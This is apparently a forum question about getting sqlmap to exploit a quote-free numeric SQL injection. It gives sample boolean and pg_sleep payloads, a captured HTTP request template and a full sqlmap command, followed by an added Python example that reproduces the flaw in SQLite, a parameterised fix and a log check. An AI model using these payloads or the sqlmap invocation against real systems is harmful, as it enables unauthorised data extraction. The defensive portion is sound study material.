
RAW SQL Injection

Çağlar Arlı - 13 Views


  1. Is there any way to instruct sqlmap to perform normal injections without escaping and commenting? For example, it's confirmed that id=1111+or+(INJECTION_HERE)=1--+ is valid, so can I instruct sqlmap to use that as an injection point and extract the data?

  2. If id=(pg_sleep(10)) would result in a sleep, is there any tool, or sqlmap itself, that can perform the injection without injecting a single quote, where it would just immediately automate all possible queries to retrieve data?

  3. Is it possible to specify an HTTP timeout as the true condition?

Update:

Even though I've checked it in Burp Suite and an HTTP timeout occurs, when using --time-sec SQLMAP still does not detect a valid injection. The reason might be that --time-sec is used for time-based injection, whereas the HTTP timeout occurs when a valid SQL query is submitted and the server takes a long time to provide a response (due to a huge amount of data).

HTTP Request (request1.txt)

POST /bin/<redacted>/RedactedServlet HTTP/1.1
Content-Length: 57
Host: example.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "Linux"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/example.html
Accept-Encoding: gzip, deflate
Accept-Language: en-MY,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=<REDACTED>
Connection: close

id=111*

SQLMap Command: sqlmap -r request1.txt --proxy=http://127.0.0.1:4442 --force-ssl --time-sec=3 --suffix=" or 1=1-- "
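The question hinges on a numeric parameter being spliced into the query without quotes, so quote-escaping is irrelevant and a payload such as 111 or 1=1-- changes the WHERE clause directly. The following is an added example, not code from the question or from sqlmap: it reproduces that server-side defect against an in-memory SQLite table (a constructed stand-in for the servlet's backend), shows the hardened lookup that validates and binds the value, and adds a simple check a defender can run over logged request bodies. The table name, column names, rows and log lines are all constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed in-memory table standing in for the application's backend.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE records (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.executemany(
        "INSERT INTO records VALUES (?, ?)",
        [(111, "alice"), (222, "bob"), (333, "carol")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """The defect the question is probing: the numeric id is concatenated
    straight into the SQL text. Because there are no quotes around it,
    escaping quote characters would not help; any boolean expression the
    caller appends becomes part of the WHERE clause."""
    sql = "SELECT id, owner FROM records WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, raw_id):
    """Hardened lookup: reject anything that is not a plain integer,
    then bind the value with a placeholder so it can never be parsed as
    SQL. Both layers matter; the regex keeps junk out of the error path
    and the placeholder removes the injection channel entirely."""
    if not re.fullmatch(r"\d{1,18}", raw_id):
        raise ValueError("id must be a plain integer")
    return conn.execute(
        "SELECT id, owner FROM records WHERE id = ?", (int(raw_id),)
    ).fetchall()


def flag_request_bodies(bodies):
    """Defender-side check over logged form bodies (constructed sample
    input): return the bodies whose id parameter is not a plain integer.
    This catches the quote-free shapes from the question (boolean tails,
    function calls such as pg_sleep) that a quote-focused filter misses."""
    flagged = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)
        for value in params.get("id", []):
            if not re.fullmatch(r"\d{1,18}", value):
                flagged.append(body)
                break
    return flagged


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign id :", lookup_vulnerable(db, "111"))
    print("vulnerable, tampered  :", lookup_vulnerable(db, "111 or 1=1--"))
    print("safe, benign id       :", lookup_safe(db, "111"))
    try:
        lookup_safe(db, "111 or 1=1--")
    except ValueError as exc:
        print("safe, tampered        : rejected ->", exc)
    sample_log = ["id=111", "id=111 or 1=1-- ", "id=(pg_sleep(10))"]
    print("flagged bodies        :", flag_request_bodies(sample_log))
```

Running the block shows the concatenated query returning every row for the tampered value while the bound query rejects it before any SQL runs. The log check is deliberately narrow (one parameter, one expected shape); it is a detection aid for this endpoint, not a substitute for fixing the query.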